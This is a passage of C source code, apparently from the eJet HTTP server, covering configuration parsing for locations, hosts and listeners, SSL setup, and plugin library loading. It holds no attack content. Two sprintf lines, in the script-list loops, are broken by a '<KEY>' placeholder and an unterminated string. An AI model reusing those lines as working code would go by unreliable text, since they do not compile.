type = SERV_FASTCGI;
}
ret = json_mgetP(jloc, "root", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
root = value;
} else {
root = host->root;
}
ploc = http_loc_alloc(path, -1, 0, matchtype, type, root);
if (!ploc) goto nextloc;
ploc->jsonobj = jloc;
ploc->matchtype = matchtype;
if (ploc->type & SERV_UPLOAD) {//upload
if (host->uploadloc)
http_loc_free(host->uploadloc);
host->uploadloc = ploc;
} else {
EnterCriticalSection(&host->hostCS);
switch (ploc->matchtype) {
case MATCH_DEFAULT: //default loc
if (ploc->type & SERV_PROXY || ploc->type & SERV_FASTCGI) { //proxy or fastcgi
ploc->matchtype = MATCH_PREFIX; //prefix matching
arr_push(host->prefix_loc_list, ploc);
actrie_add(host->prefix_actrie, ploc->path, -1, ploc);
break;
}
if (host->defaultloc)
http_loc_free(host->defaultloc);
host->defaultloc = ploc;
break;
case MATCH_EXACT: //exact matching
ptmp = ht_delete(host->exact_loc_table, ploc->path);
if (ptmp) {
http_loc_free(ptmp);
}
ht_set(host->exact_loc_table, ploc->path, ploc);
break;
case MATCH_PREFIX: //prefix matching
arr_push(host->prefix_loc_list, ploc);
actrie_add(host->prefix_actrie, ploc->path, -1, ploc);
break;
case MATCH_REGEX_CASE: //case-sensitive regex matching
case MATCH_REGEX_NOCASE: //regex matching ignoring case
arr_push(host->regex_loc_list, ploc);
#ifdef UNIX
preg = kzalloc(sizeof(regex_t));
if (ploc->matchtype == MATCH_REGEX_CASE) { //case sensitive
regcomp(preg, ploc->path, REG_EXTENDED);
} else { //ignoring case
regcomp(preg, ploc->path, REG_EXTENDED | REG_ICASE);
}
#endif
#if defined(_WIN32) || defined(_WIN64)
if (ploc->matchtype == MATCH_REGEX_CASE) { //case sensitive
preg = pcre_compile(ploc->path, 0, &errstr, &erroff, NULL);
} else { //ignoring case
preg = pcre_compile(ploc->path, PCRE_CASELESS, &errstr, &erroff, NULL);
}
#endif
arr_push(host->regex_list, preg);
break;
}
LeaveCriticalSection(&host->hostCS);
}
ret = json_mgetP(jloc, "index", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
ploc->indexnum = ret;
ploc->index[0] = value;
for (j = 1; j < (int)ploc->indexnum && j < sizeof(ploc->index)/sizeof(ploc->index[0]); j++) {
sprintf(key, "index[%d]", j);
ret = json_mgetP(jloc, key, -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
ploc->index[j] = value;
}
}
}
ret = json_mgetP(jloc, "passurl", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
ploc->passurl = value;
}
ret = json_mgetP(jloc, "cache", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
if (strcasecmp(value, "on") == 0)
ploc->cache = 1;
else
ploc->cache = 0;
}
ret = json_mgetP(jloc, "cache file", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
ploc->cachefile = value;
}
ret = json_mgetP(jloc, "script", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
arr_push(ploc->script_list, ckstr_new(value, valuelen));
for (j = 1; j < ret; j++) {
sprintf(key, "<KEY>);
subret = json_mgetP(jloc, key, -1, (void **)&value, &valuelen);
if (subret > 0 && value && valuelen > 0) {
arr_push(ploc->script_list, ckstr_new(value, valuelen));
}
}
}
ret = json_mgetP(jloc, "reply_script", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
arr_push(ploc->reply_script_list, ckstr_new(value, valuelen));
for (j = 1; j < ret; j++) {
sprintf(key, "reply_script[%d]", j);
subret = json_mgetP(jloc, key, -1, (void **)&value, &valuelen);
if (subret > 0 && value && valuelen > 0) {
arr_push(ploc->reply_script_list, ckstr_new(value, valuelen));
}
}
}
nextloc:
sprintf(key, "location[%d]", i);
ret = json_mget_obj(jhost, key, -1, &jloc);
if (ret <= 0) break;
}
return 0;
}
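/* A minimal programmatic sketch of what one parsed location amounts to. The path
pattern, root directory and FastCGI address below are illustrative placeholders,
not values taken from an eJet configuration:

    HTTPLoc * ploc = http_loc_alloc("\\.php$", -1, 0, MATCH_REGEX_NOCASE, SERV_FASTCGI, "/var/www");
    if (ploc) http_loc_set_fastcgi(ploc, "fastcgi://127.0.0.1:9000");
*/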
void * http_host_alloc (char * hostn, int hostlen)
{
HTTPHost * host = NULL;
if (!hostn) return NULL;
if (hostlen < 0) hostlen = strlen(hostn);
host = kzalloc(sizeof(*host));
if (!host) return NULL;
str_secpy(host->hostname, sizeof(host->hostname)-1, hostn, hostlen);
InitializeCriticalSection(&host->hostCS);
host->exact_loc_table = ht_new(64, http_loc_cmp_path);
host->prefix_loc_list = arr_new(4);
host->prefix_actrie = actrie_init(128, NULL, 0);
host->regex_loc_list = arr_new(4);
host->regex_list = arr_new(4);
host->uploadloc = NULL;
host->defaultloc = NULL;
host->script_list = arr_new(2);
host->reply_script_list = arr_new(2);
InitializeCriticalSection(&host->texttplCS);
host->texttpl_tab = ht_new(300, http_pagetpl_cmp_key);
ht_set_hash_func(host->texttpl_tab, ckstr_string_hash);
InitializeCriticalSection(&host->listtplCS);
host->listtpl_tab = ht_new(300, http_pagetpl_cmp_key);
ht_set_hash_func(host->listtpl_tab, ckstr_string_hash);
return host;
}
void http_host_free (void * vhost)
{
HTTPHost * host = (HTTPHost *)vhost;
int i, num;
#ifdef UNIX
regex_t * preg = NULL;
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre * preg = NULL;
#endif
if (!host) return;
#ifdef HAVE_OPENSSL
if (host->sslctx) {
http_ssl_ctx_free(host->sslctx);
host->sslctx = NULL;
}
#endif
/* ploc instance hash table freed, used for exact path matching */
if (host->exact_loc_table) {
ht_free_all(host->exact_loc_table, http_loc_free);
host->exact_loc_table = NULL;
}
/* ploc instance list freed, used for path prefix matching */
if (host->prefix_loc_list) {
arr_pop_free(host->prefix_loc_list, http_loc_free);
host->prefix_loc_list = NULL;
}
/* freeing Wu-Manber multi-pattern matching object */
if (host->prefix_actrie) {
actrie_free(host->prefix_actrie);
host->prefix_actrie = NULL;
}
/* ploc instance list freed, used as regex matching */
if (host->regex_loc_list) {
arr_pop_free(host->regex_loc_list, http_loc_free);
host->regex_loc_list = NULL;
}
if (host->regex_list) {
num = arr_num(host->regex_list);
for (i = 0; i < num; i++) {
preg = arr_value(host->regex_list, i);
#ifdef UNIX
regfree(preg);
kfree(preg);
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre_free(preg);
#endif
}
arr_free(host->regex_list);
host->regex_list = NULL;
}
if (host->uploadloc) {
http_loc_free(host->uploadloc);
host->uploadloc = NULL;
}
if (host->defaultloc) {
http_loc_free(host->defaultloc);
host->defaultloc = NULL;
}
arr_pop_kfree(host->script_list);
arr_pop_kfree(host->reply_script_list);
DeleteCriticalSection(&host->hostCS);
DeleteCriticalSection(&host->texttplCS);
if (host->texttpl_tab) {
ht_free_all(host->texttpl_tab, http_pagetpl_free);
host->texttpl_tab = NULL;
}
DeleteCriticalSection(&host->listtplCS);
if (host->listtpl_tab) {
ht_free_all(host->listtpl_tab, http_pagetpl_free);
host->listtpl_tab = NULL;
}
kfree(host);
}
void * http_host_create (void * vhl, char * hostn, int hostlen, char * root,
char * cert, char * prikey, char * cacert)
{
HTTPListen * hl = (HTTPListen *)vhl;
HTTPHost * host = NULL;
ckstr_t key;
if (!hl) return NULL;
if (hostn && hostlen < 0) hostlen = strlen(hostn);
EnterCriticalSection(&hl->hlCS);
if (!hostn || hostlen <= 0 || (hostlen == 1 && hostn[0] == '*')) {
if (!hl->defaulthost)
hl->defaulthost = http_host_alloc("*", 1);
host = hl->defaulthost;
} else {
key.p = hostn; key.len = hostlen;
host = ht_get(hl->host_table, &key);
if (!host) {
host = http_host_alloc(hostn, hostlen);
ht_set(hl->host_table, &key, host);
}
}
LeaveCriticalSection(&hl->hlCS);
if (!host) return NULL;
if (root && strlen(root) > 0) {
str_secpy(host->root, sizeof(host->root)-1, root, strlen(root));
} else if (root) {
host->root[0] = '\0';
}
/* The SNI mechanism in the TLS spec enables the client to select one of
multiple certificates corresponding to different host names. Therefore, a
NULL host name cannot be bound to an SSL certificate and key. */
if (hl->ssl_link && cert && strlen(cert) > 0 &&
prikey && strlen(prikey) > 0)
{
host->cert = cert;
host->prikey = prikey;
host->cacert = cacert;
#ifdef HAVE_OPENSSL
host->sslctx = http_ssl_server_ctx_init(host->cert, host->prikey, host->cacert);
#endif
}
return host;
}
int http_host_cmp (void * vhost, void * vname)
{
HTTPHost * host = (HTTPHost *)vhost;
ckstr_t * ckstr = (ckstr_t *)vname;
ckstr_t tmp;
if (!host) return -1;
if (!ckstr) return 1;
tmp.p = host->hostname;
tmp.len = strlen(host->hostname);
return ckstr_casecmp(&tmp, ckstr);
}
int http_host_build (void * vhl, void * jhl)
{
HTTPListen * hl = (HTTPListen *)vhl;
HTTPHost * host = NULL;
int i, hostnum;
int ret = 0, subret;
int j, num = 0;
int code = 0;
char key[128];
int keylen = 0;
char * value = NULL;
int valuelen = 0;
void * jhost = NULL;
char * hname = NULL;
int hnamelen = 0;
char * root = NULL;
char * cert = NULL;
char * prikey = NULL;
char * cacert = NULL;
void * jerrpage = NULL;
if (!hl) return -1;
if (!jhl) return -2;
sprintf(key, "host");
ret = json_mget_obj(jhl, key, -1, &jhost);
if (ret <= 0) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> has no <Host> configure option!\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "");
return -100;
}
for (hostnum = ret, i = 1; i <= hostnum && jhost != NULL; i++) {
hname = NULL;
hnamelen = 0;
root = NULL;
cert = NULL; prikey = NULL; cacert = NULL;
ret = json_mgetP(jhost, "host name", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
hname = value;
}
hnamelen = valuelen;
ret = json_mgetP(jhost, "root", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
root = value;
}
ret = json_mgetP(jhost, "ssl certificate", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
cert = value;
}
ret = json_mgetP(jhost, "ssl private key", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
prikey = value;
}
ret = json_mgetP(jhost, "ssl ca certificate", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
cacert = value;
}
/* create HTTPHost instance */
host = http_host_create(hl, hname, hnamelen, root, cert, prikey, cacert);
if (!host) break;
host->jsonobj = jhost;
ret = json_mgetP(jhost, "script", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
arr_push(host->script_list, ckstr_new(value, valuelen));
for (j = 1; j < ret; j++) {
sprintf(key, "<KEY>
subret = json_mgetP(jhost, key, -1, (void **)&value, &valuelen);
if (subret > 0 && value && valuelen > 0)
arr_push(host->script_list, ckstr_new(value, valuelen));
}
}
ret = json_mgetP(jhost, "reply_script", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
arr_push(host->reply_script_list, ckstr_new(value, valuelen));
for (j = 1; j < ret; j++) {
sprintf(key, "reply_script[%d]", j);
subret = json_mgetP(jhost, key, -1, (void **)&value, &valuelen);
if (subret > 0 && value && valuelen > 0)
arr_push(host->reply_script_list, ckstr_new(value, valuelen));
}
}
ret = json_mgetP(jhost, "gzip", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
if (strcasecmp(value, "on") == 0)
host->gzip = 1;
else
host->gzip = 0;
}
/* parse the 'error page' object */
ret = json_mget_obj(jhost, "error page", -1, &jerrpage);
if (ret > 0) {
json_mgetP(jerrpage, "root", -1, (void **)&host->errpage.root, &valuelen);
num = json_num(jerrpage);
for (j = 0; j < num; j++) {
ret = json_iter(jerrpage, j, (void **)&hname, &keylen,
(void **)&value, &valuelen, NULL);
if (ret > 0 && hname && keylen > 0) {
code = strtol(hname, NULL, 10);
if (code >= 400 && code < 420)
host->errpage.err400[code - 400] = value;
else if (code >= 500 && code < 520)
host->errpage.err500[code - 500] = value;
}
}
}
http_loc_build(host, jhost);
sprintf(key, "host[%d]", i);
ret = json_mget_obj(jhl, key, -1, &jhost);
if (ret <= 0) break;
}
return 0;
}
void * http_listen_alloc (char * localip, int port, uint8 fwdpxy)
{
HTTPListen * hl = NULL;
if (port == 0) return NULL;
if (localip == NULL) localip = "";
else if (strcmp(localip, "*") == 0) localip = "";
hl = kzalloc(sizeof(*hl));
if (!hl) return NULL;
if (localip)
strncpy(hl->localip, localip, sizeof(hl->localip)-1);
hl->port = port;
hl->forwardproxy = fwdpxy;
hl->mlisten = NULL;
InitializeCriticalSection(&hl->hlCS);
hl->host_table = ht_only_new(64, http_host_cmp);
ht_set_hash_func(hl->host_table, ckstr_string_hash);
hl->defaulthost = NULL;
hl->reqdiag = NULL;
hl->reqdiagobj = NULL;
hl->script_list = arr_new(2);
hl->reply_script_list = arr_new(2);
return hl;
}
void http_listen_free (void * vhl)
{
HTTPListen * hl = (HTTPListen *)vhl;
int i;
if (!hl) return;
arr_pop_kfree(hl->script_list);
arr_pop_kfree(hl->reply_script_list);
if (hl->mlisten) {
mlisten_close(hl->mlisten);
hl->mlisten = NULL;
}
#ifdef HAVE_OPENSSL
if (hl->sslctx) {
http_ssl_ctx_free(hl->sslctx);
hl->sslctx = NULL;
}
#endif
DeleteCriticalSection(&hl->hlCS);
if (hl->host_table) {
ht_free_all(hl->host_table, http_host_free);
hl->host_table = NULL;
}
if (hl->defaulthost) {
http_host_free(hl->defaulthost);
hl->defaulthost = NULL;
}
for (i = 0; i < 16 && i < hl->cbargc; i++) {
if (hl->cbargv[i]) {
kfree(hl->cbargv[i]);
hl->cbargv[i] = NULL;
}
}
if (hl->cbhandle) {
if (hl->cbclean)
(*hl->cbclean)(hl->cbobj);
#ifdef UNIX
dlclose(hl->cbhandle);
#endif
#if defined(_WIN32) || defined(_WIN64)
FreeLibrary(hl->cbhandle);
#endif
hl->cbhandle = NULL;
}
kfree(hl);
}
int http_listen_ssl_ctx_set (void * vhl, char * cert, char * prikey, char * cacert)
{
HTTPListen * hl = (HTTPListen *)vhl;
if (!hl) return -1;
hl->ssl_link = 1;
#ifdef HAVE_OPENSSL
if (hl->sslctx) {
http_ssl_ctx_free(hl->sslctx);
hl->sslctx = NULL;
}
#endif
hl->cert = cert;
hl->prikey = prikey;
hl->cacert = cacert;
#ifdef HAVE_OPENSSL
hl->sslctx = http_ssl_server_ctx_init(hl->cert, hl->prikey, hl->cacert);
#endif
return 0;
}
void * http_listen_ssl_ctx_get (void * vhl)
{
HTTPListen * hl = (HTTPListen *)vhl;
if (!hl) return NULL;
return hl->sslctx;
}
void * http_listen_host_get (void * vhl, char * servname)
{
HTTPListen * hl = (HTTPListen *)vhl;
ckstr_t key;
void * host = NULL;
if (!hl) return NULL;
key.p = servname; key.len = str_len(servname);
EnterCriticalSection(&hl->hlCS);
host = ht_get(hl->host_table, &key);
LeaveCriticalSection(&hl->hlCS);
return host;
}
int http_listen_cblibfile_set (void * vhl, char * cblibfile)
{
HTTPListen * hl = (HTTPListen *)vhl;
#ifdef UNIX
char * err = NULL;
#endif
char * argv[16];
int i, plen[16];
if (!hl) return -1;
if (!cblibfile) return -2;
/* firstly release all resources allocated before */
if (hl->cbhandle) {
if (hl->cbclean)
(*hl->cbclean)(hl->cbobj);
#ifdef UNIX
dlclose(hl->cbhandle);
#endif
#if defined(_WIN32) || defined(_WIN64)
FreeLibrary(hl->cbhandle);
#endif
hl->cbhandle = NULL;
}
for (i = 0; i < hl->cbargc; i++) {
kfree(hl->cbargv[i]);
hl->cbargv[i] = NULL;
}
hl->cbargc = 0;
/* now create new instance for new lib-file */
hl->cbargc = string_tokenize(cblibfile, -1, " \t\r\n\f\v", 6, (void **)argv, plen, 16);
for (i = 0; i < hl->cbargc; i++) {
hl->cbargv[i] = str_dup(argv[i], plen[i]);
}
hl->cblibfile = cblibfile;
#ifdef UNIX
hl->cbhandle = dlopen(hl->cbargv[0], RTLD_LAZY | RTLD_GLOBAL);
err = dlerror();
if (!hl->cbhandle) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> Loading DynLib <%s> error! %s\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
cblibfile, err ? err : "");
return -100;
}
hl->cbinit = dlsym(hl->cbhandle, "http_handle_init");
if ((err = dlerror()) != NULL) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> callback 'http_handle_init' load failed! %s\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
hl->cblibfile, err);
hl->cbinit = NULL;
}
hl->cbfunc = dlsym(hl->cbhandle, "http_handle");
if ((err = dlerror()) != NULL) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> callback 'http_handle' load failed! %s\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
hl->cblibfile, err);
hl->cbfunc = NULL;
}
hl->cbclean = dlsym(hl->cbhandle, "http_handle_clean");
if ((err = dlerror()) != NULL) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> callback 'http_handle_clean' load failed! %s\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
hl->cblibfile, err);
hl->cbclean = NULL;
}
#endif
#if defined(_WIN32) || defined(_WIN64)
hl->cbhandle = LoadLibrary(hl->cbargv[0]);
if (!hl->cbhandle) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> Loading DynLib <%s> error! errcode=%ld\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
cblibfile, GetLastError());
return -100;
}
hl->cbinit = (HTTPCBInit *)GetProcAddress(hl->cbhandle, "http_handle_init");
if (hl->cbinit == NULL) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> callback 'http_handle_init' "
"load failed! errcode=%ld\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
hl->cblibfile, GetLastError());
hl->cbinit = NULL;
}
hl->cbfunc = (HTTPCBHandler *)GetProcAddress(hl->cbhandle, "http_handle");
if (hl->cbfunc == NULL) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> callback 'http_handle' "
"load failed! errcode=%ld\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
hl->cblibfile, GetLastError());
hl->cbfunc = NULL;
}
hl->cbclean = (HTTPCBClean *)GetProcAddress(hl->cbhandle, "http_handle_clean");
if (hl->cbclean == NULL) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> callback 'http_handle_clean' "
"load failed! errcode=%ld\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "",
hl->cblibfile, GetLastError());
hl->cbclean = NULL;
}
#endif
if (hl->cbhandle && hl->cbinit) {
hl->cbobj = (*hl->cbinit)(hl->httpmgmt, hl->cbargc, hl->cbargv);
}
if (hl->cbfunc)
tolog(1, "eJet - HTTP Listen <%s:%d%s> DynLib <%s> load successfully!\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "", hl->cblibfile);
return 0;
}
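/* A minimal sketch (not part of the original source) of a request-processing dynamic
   library as loaded by http_listen_cblibfile_set(). The prototypes are inferred from
   how the symbols are invoked in this file: cbinit as (*cbinit)(httpmgmt, cbargc, cbargv),
   cbfunc as (*cbfunc)(cbobj, msg, path), and cbclean as (*cbclean)(cbobj). The HTTPMsg
   member calls (AddResFile, SetStatus, Reply) appear elsewhere in this source; all other
   details are illustrative.

   void * http_handle_init (void * httpmgmt, int argc, char ** argv)
   {
       // allocate and return a private object; it is handed back later as cbobj
       return kzalloc(64);
   }

   int http_handle (void * cbobj, void * vmsg, char * path)
   {
       HTTPMsg * msg = (HTTPMsg *)vmsg;

       if (msg->AddResFile(msg, path, 0, -1) < 0)
           msg->SetStatus(msg, 404, NULL);
       else
           msg->SetStatus(msg, 200, NULL);

       return msg->Reply(msg);
   }

   void http_handle_clean (void * cbobj)
   {
       if (cbobj) kfree(cbobj);
   }
*/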
int http_listen_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
InitializeCriticalSection(&mgmt->listenlistCS);
if (!mgmt->listen_list) {
mgmt->listen_list = arr_new(4);
}
return http_listen_build (mgmt);
}
int http_listen_cleanup (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
int i, num;
if (!mgmt) return -1;
num = arr_num(mgmt->listen_list);
for (i = 0; i < num; i++) {
hl = arr_value(mgmt->listen_list, i);
if (!hl) continue;
tolog(1, "eJet - HTTP Listen <%s:%d%s> stopped.\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "");
http_listen_free(hl);
}
arr_free(mgmt->listen_list);
mgmt->listen_list = NULL;
DeleteCriticalSection(&mgmt->listenlistCS);
return 0;
}
void * http_listen_add (void * vmgmt, char * localip, int port, uint8 fwdpxy)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
int i, num;
if (!mgmt) return NULL;
if (port == 0) return NULL;
if (localip == NULL) localip = "";
else if (strcmp(localip, "*") == 0) localip = "";
EnterCriticalSection(&mgmt->listenlistCS);
num = arr_num(mgmt->listen_list);
for (i = 0; i < num; i++) {
hl = (HTTPListen *)arr_value(mgmt->listen_list, i);
if (!hl) continue;
if (hl->port == port && strcasecmp(hl->localip, localip) == 0) {
LeaveCriticalSection(&mgmt->listenlistCS);
return hl;
}
}
hl = http_listen_alloc(localip, port, fwdpxy);
if (hl) {
hl->httpmgmt = mgmt;
arr_push(mgmt->listen_list, hl);
}
LeaveCriticalSection(&mgmt->listenlistCS);
return hl;
}
int http_listen_start_all (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
void * mlisten = NULL;
HTTPListen * hl = NULL;
int i, num;
if (!mgmt) return -1;
EnterCriticalSection(&mgmt->listenlistCS);
num = arr_num(mgmt->listen_list);
for (i = 0; i < num; i++) {
hl = (HTTPListen *)arr_value(mgmt->listen_list, i);
if (!hl) continue;
if (hl->mlisten) continue;
mlisten = eptcp_mlisten(mgmt->pcore,
strlen(hl->localip) > 0 ? hl->localip : NULL,
hl->port, hl, (IOHandler *)http_pump, mgmt);
if (!mlisten) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> failed.\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "");
continue;
}
hl->mlisten = mlisten;
tolog(1, "eJet - HTTP Listen <%s:%d%s> started.\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "");
}
LeaveCriticalSection(&mgmt->listenlistCS);
return 0;
}
void * http_ssl_listen_start (void * vmgmt, char * localip, int port, uint8 fwdpxy,
uint8 ssl, char * cert, char * prikey, char * cacert, char * libfile)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
void * mlisten = NULL;
if (!mgmt) return NULL;
hl = http_listen_add(mgmt, localip, port, fwdpxy);
if (!hl) return NULL;
if (ssl > 0)
http_listen_ssl_ctx_set(hl, cert, prikey, cacert);
if (libfile)
http_listen_cblibfile_set(hl, libfile);
if (!hl->defaulthost)
http_host_create(hl, NULL, -1, NULL, NULL, NULL, NULL);
if (hl->mlisten) return hl;
mlisten = eptcp_mlisten(mgmt->pcore,
strlen(hl->localip) > 0 ? hl->localip : NULL,
hl->port, hl, (IOHandler *)http_pump, mgmt);
if (!mlisten) {
tolog(1, "eJet - HTTP Listen <%s:%d%s> failed.\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "");
return hl;
}
hl->mlisten = mlisten;
tolog(1, "eJet - HTTP Listen <%s:%d%s> started.\n",
strlen(hl->localip) > 0 ? hl->localip : "*",
hl->port, hl->ssl_link ? " SSL" : "");
return hl;
}
void * http_listen_start (void * vmgmt, char * localip, int port, uint8 fwdpxy, char * libfile)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return NULL;
return http_ssl_listen_start(mgmt, localip, port, fwdpxy, 0, NULL, NULL, NULL, libfile);
}
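/* Usage sketch (assumptions: mgmt is the handle given to http_listen_init; the
   certificate and key paths are placeholders):

   http_listen_start(mgmt, "*", 8080, 0, NULL);
   http_ssl_listen_start(mgmt, "*", 8443, 0, 1, "/etc/ejet/srv.crt", "/etc/ejet/srv.key", NULL, NULL);
*/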
int http_listen_num (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
int num = 0;
if (!mgmt) return -1;
EnterCriticalSection(&mgmt->listenlistCS);
num = arr_num(mgmt->listen_list);
LeaveCriticalSection(&mgmt->listenlistCS);
return num;
}
void * http_listen_get (void * vmgmt, int index)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
EnterCriticalSection(&mgmt->listenlistCS);
hl = arr_value(mgmt->listen_list, index);
LeaveCriticalSection(&mgmt->listenlistCS);
return hl;
}
void * http_listen_find (void * vmgmt, char * localip, int port)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
int i, num;
if (!mgmt) return NULL;
if (localip == NULL) localip = "";
else if (strcmp(localip, "*") == 0) localip = "";
EnterCriticalSection(&mgmt->listenlistCS);
num = arr_num(mgmt->listen_list);
for (i = 0; i < num; i++) {
hl = (HTTPListen *)arr_value(mgmt->listen_list, i);
if (!hl) continue;
if (hl->port == port && strcasecmp(hl->localip, localip) == 0) {
LeaveCriticalSection(&mgmt->listenlistCS);
return hl;
}
}
LeaveCriticalSection(&mgmt->listenlistCS);
return NULL;
}
int http_listen_stop (void * vmgmt, char * localip, int port)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
int i, num;
if (!mgmt) return -1;
if (port == 0) return -2;
if (localip == NULL) localip = "";
else if (strcmp(localip, "*") == 0) localip = "";
EnterCriticalSection(&mgmt->listenlistCS);
num = arr_num(mgmt->listen_list);
for (i = 0; i < num; i++) {
hl = (HTTPListen *)arr_value(mgmt->listen_list, i);
if (!hl) continue;
if (!hl->mlisten) {
arr_delete(mgmt->listen_list, i); i--; num--;
http_listen_free(hl);
continue;
}
if (hl->port == port && mlisten_port(hl->mlisten) == port &&
strcasecmp(hl->localip, localip) == 0)
{
arr_delete(mgmt->listen_list, i);
LeaveCriticalSection(&mgmt->listenlistCS);
http_listen_free(hl);
return 0;
}
}
LeaveCriticalSection(&mgmt->listenlistCS);
return -1;
}
int http_listen_check_self (void * vmgmt, char * host, int hostlen, char * dstip, int dstport)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
int i, j, num;
int port_listened = 0;
ckstr_t key;
if (!mgmt) return -1;
EnterCriticalSection(&mgmt->listenlistCS);
num = arr_num(mgmt->listen_list);
for (i = 0; i < num; i++) {
hl = (HTTPListen *)arr_value(mgmt->listen_list, i);
if (!hl) continue;
if (hl->port != dstport) continue;
port_listened++;
key.p = host; key.len = hostlen;
if (ht_get(hl->host_table, &key) != NULL) {
LeaveCriticalSection(&mgmt->listenlistCS);
/* checked host is one of hosts under listened port */
return 1;
}
}
LeaveCriticalSection(&mgmt->listenlistCS);
if (!port_listened) return 0;
/* check if dstip is the loopback IP */
if (strcasecmp(dstip, "127.0.0.1") == 0) {
return 1;
}
/* check if dstip is one of the local server IPs */
for (j = 0; dstip && j < mgmt->addrnum; j++) {
if (strcasecmp(dstip, mgmt->localaddr[j].ipstr) == 0) {
return 1;
}
}
return 0;
}
int http_listen_build (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPListen * hl = NULL;
int i, j, hlnum, ret = 0, subret;
char key[128];
char * value = NULL;
int valuelen = 0;
void * jhl = NULL;
char * ip = NULL;
int port = 0;
int forwardproxy = 0;
int ssl = 0;
char * cert;
char * prikey;
char * cacert;
char * libfile = NULL;
if (!mgmt) return -1;
sprintf(key, "http.listen");
ret = json_mget_value(mgmt->cnfjson, key, -1, (void **)&value, &valuelen, &jhl);
if (ret <= 0) {
tolog(1, "eJet - No HTTPListen configured!\n");
return -100;
}
for (hlnum = ret, i = 1; i <= hlnum && jhl != NULL; i++) {
ip = NULL;
port = 0;
forwardproxy = 0;
ssl = 0;
libfile = NULL;
cert = NULL;
prikey = NULL;
cacert = NULL;
ret = json_mgetP(jhl, "local ip", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
ip = value;
}
json_mget_int(jhl, "port", -1, &port);
ret = json_mgetP(jhl, "forward proxy", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
if (strcasecmp(value, "on") == 0)
forwardproxy = 1;
else
forwardproxy = 0;
}
ret = json_mgetP(jhl, "ssl", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
if (strcasecmp(value, "on") == 0)
ssl = 1;
else
ssl = 0;
}
ret = json_mgetP(jhl, "ssl certificate", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
cert = value;
}
ret = json_mgetP(jhl, "ssl private key", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
prikey = value;
}
